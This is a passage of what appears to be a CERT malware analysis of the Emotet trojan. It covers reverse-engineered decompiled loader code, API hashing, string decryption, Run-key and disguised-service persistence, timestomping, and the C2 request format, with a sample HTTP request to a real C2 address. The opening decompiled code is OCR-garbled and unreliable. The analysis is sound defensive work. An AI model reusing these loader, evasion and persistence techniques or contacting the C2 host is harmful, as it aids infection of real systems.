puVaré = (undefined4 *)VirtuaLALloc( (LPVOID) Ox0,unaff_EDI,@x1000,0x40);
uVarS = unatf_EDI >> 2:
puVar6 = puVards
while (uVar5 != 6) {
uVar5 = uVarS — 1;
*puVar6 = *xunatT_EBP;
unatTf_EBP = unaTtT_EBP + 1;
puVar6 = puVar6 + 1;
}
uVar5 = unatf_EDI & 3
while (uVar5 != 6) {
uVar5 = uVarS — 1;
*(undefined *)puVar6é = *({undefined *)unatf_EBP;
unatf_EBP = (undefined4 +) ((int)unaff_EBP + 1);
puVaré = (undefined4 *)((int)puVar6é + 1);
}
FUN_00401500( (int)s_JP?vvBOMIIJLO7KH1Gcpth7awdb$uiv(_00414068,0x20,&stackOxtftffe6s);
FUN_@0402540( (int) puVard,unaff_EDI ,&stackOxfffffeba);
(*(code *)puVard)();
DAT_@0415@a4 = pHStackl2;
Dia logBoxParamA(pHStacki2, (LPCSTR) 0x82, (HWND)Ox@,FUN_00401710,0);
hAccTable = LoadAcceleratorsA(pHStack12, (LPCSTR)Qx6d);
iVar3 = GetMessageA( (LPMSG)&DAT_004150a8, (HWND)0x0,0,0);
while (iVar3 != 6) {
iVar3 = Trans lateAcceLeratorA(DAT_004150a8,hAccTabLe, (LPMSG)&DAT_004150a8);
if (iVar3 = 0) {
Trans LateMessage((MSG *)&0AT_0§04150a8);
DispatchMessageA((MSG *)&DAT_604150a8);
}
iVar3 = GetMessageA( (LPMSG)&DAT_004150a8, (HWND)0x0,0,0);
}
if (Oxf < uStacklos) {
_free(pvStack128);
}
uStackl08 = @xt;

lees] TA — fomdaaFanend A dein Vie

24/56


25/56

Figure 10. Code referencing the keys in various Protectors
We reverse engineered this part of the code, and ended up with the following code:

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-code-4.png


26/56

WPARAM FUN_00407b2e(HINSTANCE param_1,int param_2) 
 
{ 
 byte *resourceBuffer; 
 _LDR_RESOURCE_INFO resourceInfo; 
 _IMAGE_RESOURCE_DATA_ENTRY *ResourceDataEntry; 
 void *resource; 
 word iv; 
 dword resourceSize; 
... 
   resource = (void *)0x0; 
   resourceSize = 0; 
   resourceInfo.Type = 10; 
   resourceInfo.Name = 0x1e55; 
   resourceInfo.Language = 0x409; 
... 
 _LdrFindResource_U_PTR = 
GetProcAddress(s_ntdll_Module2,s_LdrFindResource_U_0040d8cc); 
... 
   _LdrAccessResource_PTR = 
GetProcAddress(s_ntdll_Module2,s_LdrAccessResource_0040d8b4); 
   iVar3 = (*_LdrFindResource_U_PTR)(0x400000,&resourceInfo,3,&ResourceDataEntry); 
   if (-1 < iVar3) { 
     (*_LdrAccessResource_PTR)(0x400000,ResourceDataEntry,&resource,&resourceSize); 
   } 
   resourceBuffer = (byte *)VirtualAlloc((LPVOID)0x0,resourceSize,0x1000,0x40);
   memcpy(resourceBuffer,resource,resourceSize); 
   DeriveKey(s_*FLrY4bO%4Th$J8Gt0z*zKiB)Yb#mGNy_0040d5b4,0x57,(uint)&iv); 
   DecryptResource(resourceBuffer,resourceSize,&iv); 
   (*(code *)resourceBuffer)(); 
... 
}

The code above has the following functionality:

Allocates an executable memory region with VirtualAlloc() , where 0x40
corresponds to PAGE_EXECUTE_READWRITE  protection level,
loads a specific resource from the executable’s resources into this region,
derives a decryption key from the previously mentioned main key,
decrypts the contents of the resource using the derived key, and finally,
uses the reference to the decrypted data as a function pointer and calls the function.

In deriveKey.c and decryptResource.c we include the reverse engineered code of the
functions.

The attackers hid the actual payload in the resource described by the
following RESOURCE_INFO  variable:

resourceInfo.Type = 10; 
resourceInfo.Name = 0x1e55; 
resourceInfo.Language = 0x409;

https://github.com/grnet/emotet-utils/blob/master/decompiled/deriveKey.c
https://github.com/grnet/emotet-utils/blob/master/decompiled/decryptResource.c


27/56

We found the payload in the resources section of the executable file, just below this mouse
icon:

Figure 11. The encrypted payload in Emotet Protector’s resources
At that point we had the encrypted payload, the main key, the key derivation function and the
decryption function. The only thing left was to decrypt the payload. So we reused the
reversed engineered DeriveKey()  and DecryptResource()  functions to write a small
decryption tool. After that we were able to decrypt the resource.

The decrypted resource

Loading the decrypted resource in Ghidra was not just a drag-n-drop task. Apparently, there
were no executable headers to let Ghidra infer the architecture details. However, we knew
that this payload was loaded in the memory space of the initial executable so we only had to
define the architecture to be the same as the initial executable. Furthermore, we knew that
the executable starts with a function (the pointer to the memory was handled as a function
pointer as previously described). With a little manual work, we managed to analyze the
payload with Ghidra:

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-encrypted-resource.png


28/56

Figure 12. The decrypted resource’s entry-point
As shown above, the code pushes some values in the stack and then calls function
FUN_0000002d() . The values pushed in the stack must be the function arguments. Among

these values we noticed 0x529  and 0x31529  which Ghidra analyzed as memory
references ( DAT_0000052e  and DAT_0003152e ).

DAT_0003152e  contains the last 5 bytes of the executable representing the null-terminated
string “ dave ” that looked like a magic value.

Figure 13. The referenced DAT_0003152e in decrypted resource
DAT_0000052e  was more interesting. The first two bytes were the printable characters

“MZ”. As you probably know this is the header signature of DOS MZ executables. This was a
very good lead.

The file can be identified by the ASCII string “MZ” (hexadecimal: 4D 5A) at the
beginning of the file (the “magic number”). “MZ” are the initials of Mark Zbikowski, one
of leading developers of MS-DOS.

Wikipedia

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage2-entry.png
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage2-param2-dave.png
https://en.wikipedia.org/wiki/DOS_MZ_executable


29/56

Figure 14. The MZ magic value in the decrypted resource
By further examining the contents of DAT_0000052e , we identified some known MS-DOS
stub strings, such as the “This program cannot be run in DOS mode”. Of course this
resembles a PE executable.

Figure 15. The MS-DOS stub in the decrypted resource
We went on reversing the FUN_0000002d()  function assuming that its first argument is a
reference to a PE executable.

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage2-param1-mz.png
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-param1-msdos-stub-edited-1.png


30/56

The first difficulty was the mysterious function named FUN_00000456() . This function is
invoked several times at the beginning of FUN_0000002d()  with a different argument each
time. The return values are stored on local variables and later on they are used as function
pointers. Apparently, the function somehow resolved these arguments to function addresses.
Thus we needed to reverse engineer FUN_00000456() .

Figure 16. Symbol resolving in the decrypted resource’s code
Examining FUN_00000456() , we came across a technique for resolving library symbols.
Specifically, the function retrieves the list of loaded libraries ( InLoadOrderModuleList )
from the Process Environment Block (PEB) and loops over each exported symbol of each
library. On each loop a combined hash (32-bit value) of the library name and symbol name is
calculated. If this value matches the function argument, a pointer to the address of the
corresponding function is returned (in resolveImportByHash.c we include the reverse
engineered code of the function). As soon as we understood the internals of the hashing
mechanism, we wrote a short script, generate_symbol_hashes1.py, that calculates these
hash values for every symbol of several common libraries ( ntdll.dll , kernel32.dll ,
etc) and exports them to a proper (and long) C enumeration:

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage2-code.png
https://github.com/grnet/emotet-utils/blob/master/decompiled/resolveImportByHash.c
https://github.com/grnet/emotet-utils/blob/master/utilities/generate_symbol_hashes1.py


31/56

Figure 17. Calculated symbol hashes enumeration
After importing the generated enum in our Ghidra project (and properly retyping the function),
we had a clear view of which library functions are called later on:

Figure 18. Reverse engineered symbol resolving
We were now able to continue reversing the FUN_0000002d()  function. After some good
amount of analysis we concluded that the function is a pretty basic binary image loader with
the following function signature (in loadBinary.c we include the complete reverse engineered
code):

byte * loadBinary(byte *pe_ptr,byte *functionToRunHash,byte *functionToRunParam1, int 
functionToRunParam2,int copyDosHeader)

Internally, the function:

allocates the memory buffer (in which the image will be loaded) with
VirtualAlloc() ,

copies the headers from the source image,
copies the sections from the source image,
loads and links the imported symbols (libraries),
applies the relocations,

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage2-export-hashes-edited.png
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage2-resolved-hashes.png
https://github.com/grnet/emotet-utils/blob/master/decompiled/loadBinary.c


32/56

applies proper memory protection to each section with VirtualProtect()  (that way
the executable sections of the loaded binary will be in executable memory sections),
runs the executable’s entry-point,
runs an exported symbol, the name of which matches the functionToRunHash  hash
value, passing the parameters functionToRunParam1  and functionToRunParam2 ,
returns a pointer to the allocated buffer.

The code at the beginning of the encrypted payload could now be translated into something
meaningful:

Figure 19. Reverse

engineered entry-point
In this way, we knew that the executable included at address 0x0000052e  will be loaded.
Then, the entry-point is invoked:

Figure 20.

Reverse engineered code running the nested binary
When the entry-point returns, its exported symbol, i.e., an exported function with a name
matching the 0xed1c7b90  hash value, will run.

We exported the executable included at address 0x0000052e  in a separate file and loaded
it into Ghidra.

The nested executable

We loaded the nested executable in Ghidra and went straight to the entry-point. The entry-
point just calls a function with a couple of parameters.

Figure 21.

The nested executable’s entry-point
You might wonder what is this DAT_10004070  value. So did we. As a result, we had a quick
look into its contents:

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage2-loadbinary.png
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage2-run-stage3.png
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage3-entry.png


33/56

Figure 22. MZ magic

value in the nested executable
That “MZ” signature on the right looks familiar, doesn’t it? Well, this is another nested PE
executable! It was like opening a matryoshka doll.

We reverse engineered the FUN_10001000()  function and, as you can probably guess, it
was yet another binary image loader with the following function signature:

struct_paramContainer * __cdecl loadBinary(byte *pe_ptr,uint pe_size)

Internally, it performs the following tasks:

allocates the memory buffer (in which the image will be loaded) with
VirtualAlloc() ,

copies the headers from the source image,
fixes the relocation table entries according to the offset between the allocated buffer
address and the ImageBase ,
loads and links the imported symbols (libraries),
copies the sections from the source image and applies proper memory protection to
each section with VirtualProtect()  (that way the executable sections of the loaded
binary will be in executable memory),
initializes the Thread Local Storage (TLS) according to the image TLS Section,
modifies the base addresses ( ImageBaseAddress  and LoaderData-
>InLoadOrderModuleList->DllBase ) of Process Environment Block (PEB) so that
they point to the allocated buffer,

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage3-mz.png


34/56

runs the executable’s entry-point.

Figure 23. Reverse

engineered code running the actual trojan
Once again we exported the executable included at address 0x10004070  in a separate file
that we had to explore.

Chapter 3. Overcoming the malware obfuscation techniques

Introduction

In the previous chapter, we explored the steps until the actual trojan is executed. We
observed that the downloaded executable, decrypts part of itself and executes the second
stage payload. This payload in turn, executes another payload, i.e. the executable that we
will analyze in this chapter and Chapter 4.

In this Chapter, we’ll fast-forward and describe the obfuscation techniques employed by the
latter executable. This will provide us with the necessary background to further explain its
functionality in Chapter 4.

Symbol Resolution Obfuscation

The first thing that we noticed after loading the executable in Ghidra was that it does not
import any symbols. In particular, it is not feasible for an executable of only 369 KB, to have
a Windows API implementation statically linked. Hence, it became obvious that it was
probably using a custom mechanism to resolve symbols from system libraries.

Figure 24. Emotet trojan’s Symbol Tree

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage3-run-entry.png
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-symbol-tree.png


35/56

Starting from the entry-point, we noticed the following lazy initialization pattern, the result of
which is stored in a global variable and is used as a function pointer. The same pattern (and
some variations of it) is used all over the executable.

Figure 25. Symbol resolving in

Emotet trojan’s entry-point
Could this be the custom symbol resolution mechanism employed by the trojan to hide the
APIs that it uses? To find out, we reversed engineered functions FUN_00404190()  and
FUN_004040f0() . Indeed, these two functions work almost like FUN_00000456()

described in Chapter 2:

FUN_00404190()  starts from the Thread Information Block (the address of which is
available from the FS  segment register on 32-bit Windows), accesses the Process
Environment Block (PEB) and iterates over the list of loaded modules
( InLoadOrderModuleList ). For each module, it calculates the hash of its lower-
cased name and compares it against the specified parameter. If they match, the
function returns the module’s base address. Essentially, it works like
GetModuleHandle() , but instead of specifying the module’s name, the caller

specifies the module name’s hash.
FUN_00000456()  parses the module specified in the first parameter to find its export

table and iterates over the exported symbols. For each exported symbol, it calculates
the hash of its name and compares it against the value specified in the second
parameter. If they match, it either returns the address that the symbol points to (if the
symbol is an export) or recursively resolves the symbol forwarded from another module
(if the symbol is a forwarder).

This technique is called API Hashing. In findModuleByHash.c
and findModuleExportByHash.c we include the reverse engineered code of the functions.

Again, we wrote a short script, generate_symbol_hashes2.py, that calculates the hashes for
every symbol of some common libraries (e.g. ntdll.dll , kernel32.dll , etc.) and
exports them to two C enumerations:

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-entry.png
https://github.com/grnet/emotet-utils/blob/master/decompiled/findModuleByHash.c
https://github.com/grnet/emotet-utils/blob/master/decompiled/findModuleExportByHash.c
https://github.com/grnet/emotet-utils/blob/master/utilities/generate_symbol_hashes2.py


36/56

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-resolved-module-hashes.png
MODULE_HASH {
authhelper_dUt = Ox68d97976,
= 0x/697bbce,

Sion_dLl = Ox540@5ae70,
ost_dLl = ®xb4cd6dbl1,
pop l_d ll Qxe@b4yael,
—— = Oxbc/ba92c,

= honorees.
= @x2b9e788
= puaareeode,
it ra = §x90632d6c,
tall = OxBATS4092
e = @xec99a195,
= Ox57/dd76,
dll = = §x85551bc7,
_GLL = @x683689cc,
= 0xb6260491,
= @xde53fsab,
= 0x8 87c845ed,
der_dll = @xe579c/ee,

LL = O@xc7166eT9,

T_dll = @xedcl190b4,
4 dll = OxaQ6f9eb/,
‘trnal_dll = O@xd?be53bd,
Adap § dll = @x9ef17c65,
Addre ser_dll = Oxfeb4b58T,
AdmTmpl_dll = @x7a332T13,
r_dll = @x82debacc,
a ee Ee

= $x8b6c1397,
= Ox6Teb6Ter,
= §xbez75352a,
dll = @x9eddabée,
Ll = O@x4d01bfla,
dil = Ox35bTeb96,
= Ox9a35b6e4,
= O@xdadazecc,
c dll. = @x8f25ed41a,
altspace_dLl = O@xa43bb7b5,
i = @x26e31Tbe,

36/56


37/56

Figure 26. Calculated library and symbol names hashes enumerations
After importing the enumerations in Ghidra, we had a clear view of the modules and
functions imported by these calls.

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-resolved-module-exports-hashes.png


38/56

Figure 27. Emotet trojan’s reverse engineered symbol resolving

String Obfuscation

We noticed that the binary did not contain any strings. This made us suspicious because it is
impossible for an executable that performs a meaningful functionality, not to contain any
strings. As a result, we assumed that some kind of string obfuscation is used. The following
is the full list of the strings that we identified.

Figure 28. List of defined strings in Emotet trojan
The first time we met the use of a string was in a call to LoadLibraryW() , the only
parameter of which is the name of the library to be loaded. The value passed
to LoadLibraryW()  is returned from function FUN_004035f0() , which in this case
operates on binary data at memory address 0x40d7f0 . It became apparent that this
function must be doing some kind of transformation (see decryption) to the data pointed to by
its input.

Figure

29. Emotet trojan’s call of string decryption function
We reversed engineered the function and we confirmed our guess, its purpose is to decrypt
the input binary data to a Unicode string. The first 4 bytes of the binary data are the XOR
key, the next 4 bytes are the string’s encrypted length and the rest are encrypted string itself.
After decrypting the length, the function iterates over all quadruples of encrypted characters
(remember that the key is 4 bytes long) until all have been decrypted.

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-entry-with-resolves.png
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-strings.png
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-string-decrypt-use.png


39/56

Figure 30. Emotet trojan’s string decryption internals
For the sake of completeness, in decryptWideString.c we included the reverse engineered
code of that function.

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-string-decryption.png
https://github.com/grnet/emotet-utils/blob/master/decompiled/decryptWideString.c


40/56

Two more versions of this function exist in the executable: one that decrypts the ciphertext to
an ASCII string and one to a byte array. Luckily, all are compatible with each other as
ciphertexts are processed as 32-bit integers. Only their output types differ.

We implemented a tool to decrypt any string or byte array in the executable. The source
code can be found in decrypt_bytes.py.

$  ./decrypt_bytes.py nested-payload-2.exe 0xb9f0 
shlwapi.dll

Control Flow Obfuscation

We continued our analysis with function FUN_0406860() , the first function that the entry-
point calls, and observed some kind of control flow obfuscation. Specifically, the function’s
body is split into multiple if  blocks, wrapped in a while  loop. The flow is determined by a
control variable that is set at the end of each block. Furthermore, as seen from the function
graph below, the majority of the blocks have the same predecessor and successor blocks.
This technique resembles the Control Flow Flattening technique, in which each function is
split into basic blocks that are encapsulated in a switch  block wrapped in a while  loop.

https://github.com/grnet/emotet-utils/blob/master/utilities/decrypt_bytes.py
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-main-code.png


41/56

Figure 31. Emotet trojan’s Control Flow Obfuscation
This technique is also applied to the vast majority of the functions in the executable.

We were aware of techniques to automatically de-obfuscate control flow flattening (e.g. the
technique described in this quarkslab blog post), but since the size of the code was small
enough we decided to follow the flow manually.

Chapter 4. The trojan’s internals

Introduction

In the previous chapter we had a look at the trojan executable. We identified several
obfuscation techniques incorporated in the executable and described the methods we used
to overcome them. In this chapter, we will discuss the trojan’s inner functionalities.

Main flow overview

We followed a depth-first approach to reverse engineer the executable. We started from the
function FUN_0406860() , the one called by the executable’s entry-point, which we called
“main”.

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-main-control-flow.png
https://blog.quarkslab.com/deobfuscation-recovering-an-ollvm-protected-program.html


42/56

Figure 32.

Emotet trojan’s entry-point
Then, we followed the flow examining each function call. We did this until we reached a
function that either made no further calls or only invoked already examined functions. After a
couple of weeks we had completely studied the executable’s code.

As a result, we were able to draw the code flow of the main function in a meaningful manner.
Below, we present the main control loop of the trojan:

Figure 33. Emotet

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-decompiled-entry.png
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-main-flowchart.png


43/56

trojan’s main function flow chart
The basic groups of states are highlighted:

Grey states: Initialization of internal variables.
Purple states: Persistence-related operations (running during the first run of the trojan
or after communicating with the C2 network).
Green states: Initialization of parameters related to the communication with the C2
network.
Blue states: Initialization of static data to be included in requests to the C2 network.
Orange states: Re-initialization of variable data to be included in the next request to the
C2 network.
Red states: Communication with the chosen C2 server.
Yellow state: Handling of the C2 server’s response.

Initially, the trojan loads the required libraries (states 1 and 2) and initializes its internal
variables (state 3).

Then, it checks whether it will run with command line arguments or not (state 4). The
existence of command line arguments indicates that this is the first run of a self-update. The
command line arguments contain the file path where the executable will have to migrate to.
In that case, states 8-13 perform a series of actions related to the persistence of the trojan.

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-main-flowchart.png


44/56

Specifically, any existing file in the target file-path is renamed (state 8), the current
executable is stored in the target file-path and its Zone Identifier ADS is removed (state 9).
The created file is marked as “old” by changing its timestamps (state 10). If the process runs
with administrative permissions, a new Service for the executable is created (state 11). Then,
it waits until it receives a signal from its parent process (state 12). Finally, it runs itself from
the newly created executable (state 13).

In case that command line arguments are absent it’s either the first run after the Protector
extracted the trojan or it’s any later run. This is inferred by checking the executable’s
timestamp (state 5). In case it’s indeed a first-run, any existing Services for the executable
are removed provided that the executable has administrative permissions (state 6), and then
a random legitimate-looking file-path is picked as the target for the executable file (state 7).
Then, states 8-13 run performing the series of actions described earlier.

In case it not a first-run (indicated by a “recent” timestamp) and the trojan runs with
administrative permissions, it checks whether its parent process name is “ services.exe ”
(state 14). If so, it runs itself in a new process (state 13) and terminates the current process.

Finally, if this is not the first run (indicated by an “old” timestamp), and the trojan runs without
administrative rights or its parent process name is not “ services.exe “, the C2
communication flow happens. First, a new thread that monitors the changes of the current
process’ executable filename is started (state 15). Then the control reaches state 16 and
always returns to it until the current process’ executable filename changes. That will be the
result of a self-update and after that, the trojan will wait for any threads to terminate (state
39) and then will terminate its process.

While no changes of the filename are detected, the trojan will repeatedly communicate with
C2. First, the C2 communication parameters are initialized once (states 17-20). Furthermore,
the request data regarding the host system information are also initialized once (states 21-
26). On each communication attempt, the list of the processes currently running on the
system as well as the list of active payload IDs will be included in the request (states 27-28).
Then the actual communication with C2 is performed (states 29-31). Upon a successful
communication the trojan will first check if a termination flag was received. In that case it will
immediately move its executable to the Temp folder and terminate itself (state 38).
Otherwise, any existing files in the folder containing the trojan’s executable are deleted and a
new auto-run Registry Key is created (state 32). Then, the trojan will loop over the received
payloads and execute them (state 33).

On the rest of the chapter we will focus on two main functionalities of the trojan, the
persistence mechanisms and the communication with the Command-and-Control servers.

Persistence mechanisms


45/56

To identify its first run, the trojan should either run with command line arguments, or the
LastWriteTime  of its executable file needs to be less than 8 days old. The timestamp is

retrieved by calling GetFileInformationByHandleEx()  on the handle returned by
GetModuleFileNameW() .

Upon its first run, the trojan places its executable file in a sub-folder inside one of the
following Windows Special Folders:

CSIDL_LOCAL_APPDATA  (usually C:\Users\username\AppData\Local ) if the trojan
runs without administrator rights, or
CSIDL_SYSTEMX86  (usually C:\Windows\SysWOW64 ) if the trojan runs with

administrator rights.

The names given to sub-folder names and the filename of the malware, depend on whether
the executable did run with command line arguments or not:

With no command line parameters, the malware chooses two random files from the
legitimate executable (.exe) and library (.dll) files contained in the CSIDL_SYSTEM
(usually C:\Windows\System32 ) folder. The names of these randomly chosen files
are used to define the name of the sub-folder that the malware will be stored in, as well
as the filename that the trojan will be stored with inside this sub-folder.
When invoked with command line parameters, the sub-folder name and filename for
the malware are parsed from the base64-encoded command line argument. The
structure of the base64-decoded command line argument is described in detail in the
Responses from C2 section.

Furthermore, it deletes the corresponding Zone.Identifier Alternate Data Stream
(which is added by the web client to mark files downloaded from external sites as possibly
unsafe to run).

Finally, all the timestamp attributes of the file ( CreationTime, LastAccessTime,
LastWriteTime and  ChangeTime ) are set to 8 days in the past. In this way, the next time
the malware runs, will be aware that it is not the first time.

To achieve persistence, two different methods are used:

1. Registry Key: Upon receiving a C2 response, it creates a sub-key of
the HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
registry key. The sub-key type is String ( REG_SZ , 0x1 ), its name is the filename of
the trojan and the Value  is the full path inside the Windows Special Folder.


46/56

2. System Service: Upon its first run, if running with administrator rights it creates a new
Service. The Service type is SERVICE_WIN32_OWN_PROCESS  ( 0x10 ) and its binary
path is the full path inside the Windows Special Folder. Once the service is created it
picks a random legitimate service from the list returned
by EnumServicesStatusExW()  and copies its description on the malicious service,
using QueryServiceConfig2W()  and ChangeServiceConfig2W()  respectievely,
making it difficult to distinguish from legitimate services.

Command-and-Control

After achieving persistence, the trojan tries to communicate with one of the Command and
Control (C2) servers to inform it about the compromised system and retrieve the payloads to
execute. Emotet’s C2 network consists of multiple C2 servers with different C2 servers
having different up-times, achieving redundancy and lowering the probability of detection. In
total, we identified 126 unique C2 servers spread all over the world, mainly located in
Europe, the Americas and south-east Asia:

Figure 34. Emotet’s Command-and-Control server locations
The trojan binaries come with the list of IPv4 addresses and ports of all C2 servers
embedded. The C2 servers are tried sequentially, until one responds successfully. On the
first run, the trojan starts from the first C2 server of the list. On all subsequent runs, it
continues from the last C2 server that responded successfully. We again wrote a short script
to automatically extract the IPv4 addresses and ports from the binaries, which can be found
in extract_c2_socket_addresses.py. Finally, all C2 servers share a common private key
which is used for protecting the communication between the trojan and the C2 server. The
public key is also embedded in the trojan binaries, albeit encrypted.

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-c2-network-map.png
https://github.com/grnet/emotet-utils/blob/master/utilities/extract_c2_socket_addresses.py


47/56

Data exchange between the trojan and the C2 server utilizes a complex serialization and
deserialization mechanism, which includes compression and encryption of both the request
and response data. The actual communication takes place over plain HTTP, presumably to
evade protections based on flagged TLS certificates. During the trojan’s initialization phase,
the C2’s RSA-768 public key is decrypted (using the decryption function described in the
previous chapter) and a random AES-128 session key is generated (using the Windows
Crypto API). The public key is used to encrypt the session key and verify the response and
the session key to encrypt the request and decrypt the response. The encrypted session key
is included in the request so that the C2 server can decrypt the request payload. Finally,
SHA-1 is used for hashing.

The primitive data types used in the exchanged messages are the byte , the char  and
the uint  (32-bit). The non-primitive data types are struct Bytes  and struct String ,
as shown in the following code snippet:

struct Bytes { 
   byte *buffer; 
   uint size; 
};
 
struct String { 
   char *buffer; 
   uint length; 
};

All primitive data types are serialized in little-endian byte order. A struct Bytes
is serialized to the size of the buffer followed by the actual bytes of the buffer. A struct
String  is serialized to the length of the string followed by the characters of the string,
excluding the null terminator.

Request Payload

The trojan uses information gathered from the compromised system to assemble the request
payload. This includes information that can be used to uniquely identify the system,
information about the operating system and the running processes as well as the current
state of the trojan itself. Upon analyzing the binary, we concluded that the structure of the
request payload as used internally by the trojan is the following:

struct RequestPayload { 
   struct String systemId; 
   uint systemInfo; 
   uint rdpSessionId; 
   uint date; 
   uint value_1000; 
   struct String otherProcessExecutableNames; 
   struct Bytes payloadIds; 
   uint currentProcessExecutablePathHash; 
};


48/56

The request payload struct is serialized to the serialized request payload by serializing and
concatenating its fields in the order they appear, as shown in the image below.

Figure 35. Emotet’s

serialized request payload
systemId

The ID assigned to the compromised system. It is constructed using the format string
%s_%08X , where the first specifier corresponds to the computer name and the second

specifier to the volume serial number of the disk partition where Windows are installed. To
get the computer name, GetComputerNameA()  is used. To get the volume serial number,
GetWindowsDirectoryW()  is used to get the drive letter of the partition where Windows

are installed and then GetVolumeInformationW()  is utilized to get the volume serial
number of that partition. Non-letter and non-digit characters in the computer name are

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-c2-request-payload.png


49/56

replaced by the character X . For example, for the compromised system with computer
name DESKTOP-K1C601  and volume serial number B4A6-FEC6  the value of systemId
would be DESKTOPXK1C601_B4A6FEC6 .

systemInfo

A numeric value that encodes information regarding the OS and the architecture of the
compromised system. The trojan uses RtlGetVersion()  and GetNativeSystemInfo()
to get the OSVERSIONINFOEXW and SYSTEM_INFO structures, respectively. The numeric value
is constructed as shown below:

OSVERSIONINFOEXW.wProductType * 100000 + OSVERSIONINFOEXW.dwMajorVersion * 1000 + 
OSVERSIONINFOEXW.dwMinorVersion * 100 + SYSTEM_INFO.wProcessorArchitecture

For example, the systemInfo  value of 110009  means that the operating system is
Windows 10 and the processor architecture is x64:

wProductType : 1 ( VER_NT_WORKSTATION )
dwMajorVersion : 10
dwMinorVersion : 0
wProcessorArchitecture : 9 ( PROCESSOR_ARCHITECTURE_AMD64 )

rdpSessionId

The Remote Desktop Services session under which the current process is running. The
trojan uses GetCurrentProcessId()  to get the current process ID and
ProcessIdToSessionId()  to convert the process ID to the RDP session ID.

date

The value 20200416  is hardcoded in the request payload, which can presumably be
decoded to the date April 16, 2020. This could be the date that the current campaign started,
however this cannot be confirmed.

value_1000

The value 1000  is hardcoded in the request payload. Its purpose is unknown.

otherProcessExecutableNames

A comma-separated list of the names of all processes running in the system, except for the
current and the parent processes. The trojan uses CreateToolhelp32Snapshot()  to take
a snapshot of all processes in the system and Process32FirstW() / Process32NextW()
to iterate over them. The current and the parent processes are filtered out. For example:

SearchFilterHost.exe,SearchProtocolHost.exe,Taskmgr.exe,conhost.exe,PowerShell.exe,not

https://docs.microsoft.com/en-us/windows/win32/api/sysinfoapi/ns-sysinfoapi-system_info
https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_osversioninfoexw


50/56

payloadIds

The IDs of the payloads received from the C2 server that are currently running. To support
this functionality, the C2 server assigns an ID to every payload and the trojan maintains an
in-memory list of the active payloads. Using this value, the C2 server is informed about the
payloads that are currently running. The list of IDs is represented as an array of unsigned
integers. For example, if the payloads with IDs 2643 , 2647 , and 2759  are currently
running, the value of payloadIds  would be:

53 0a 00 00 57 0a 00 00 c7 0a 00 00

currentProcessExecutablePathHash

The hash of the full path of the current process’ executable, lower-cased. The trojan uses
GetModuleFileNameW()  to get the path and a custom hash function to hash the path, the

reverse engineered version of which can be found in hashLowercase.c. For example, if the
path of the trojan’s executable was C:\Users\IEUser\AppData\Local\dxdiag\reg.exe ,
the hash value would be 0x9f955b9 .

Request

The request encapsulates the request payload described before as well as the request flags.
The request flags are used to specify the type of the request payload.

struct Request { 
   uint flags; 
   struct Bytes compressedPayload; 
};

Before serializing the request struct, the serialized request payload is compressed using a
LZ77-style algorithm, forming the compressed request payload. The request struct’s fields
are serialized in the order they appear to form the serialized request, following again the
aforementioned serialization rules.

Finally, the session key is encrypted with the C2 servers’ public key (96 bytes), the serialized
request is hashed (20 bytes) and then encrypted with the session key to form the encrypted
request. The encrypted session key, the request hash and the encrypted request form the
request body. This is illustrated in the following image.

https://github.com/grnet/emotet-utils/blob/master/decompiled/hashLowercase.c


51/56

Figure 36. Emotet’s

encrypted request

HTTP request-response

The trojan communicates with the C2 server over plain HTTP, using the WinINet API. In
preparation of the communication, the trojan generates a random URL path, a random
boundary for the multipart/form-data body and random field and file names for the form part
to be submitted. Various headers (e.g. the Accept header) are hardcoded, while others (e.g.
the User-Agent header) are system-dependent. Following is a sample HTTP request sent by
the trojan to a C2 server:

GET /3QDtL0eyVn/macjAF9/ HTTP/1.1 
Host: 46.101.58.37:8080 
Cache-Control: no-cache 
Upgrade-Insecure-Requests: 1 
Referer: 46.101.58.37/ 
Accept-Encoding: gzip, deflate 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; 
.NET4.0C; .NET4.0E) 
DNT: 1 
Connection: keep-alive 
Content-Type: multipart/form-data; boundary=---------------gby5HOqeZpTWuWuQV0Pq0e 
Content-Length: 5090 
 
-----------------gby5HOqeZpTWuWuQV0Pq0e 
Content-Disposition: form-data; name="iopq"; filename="yyexctg" 
Content-Type: application/octet-stream 
 
<encrypted session key || serialized request hash || encrypted request> 
-----------------gby5HOqeZpTWuWuQV0Pq0e--

And the corresponding HTTP response:

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-c2-request.png


52/56

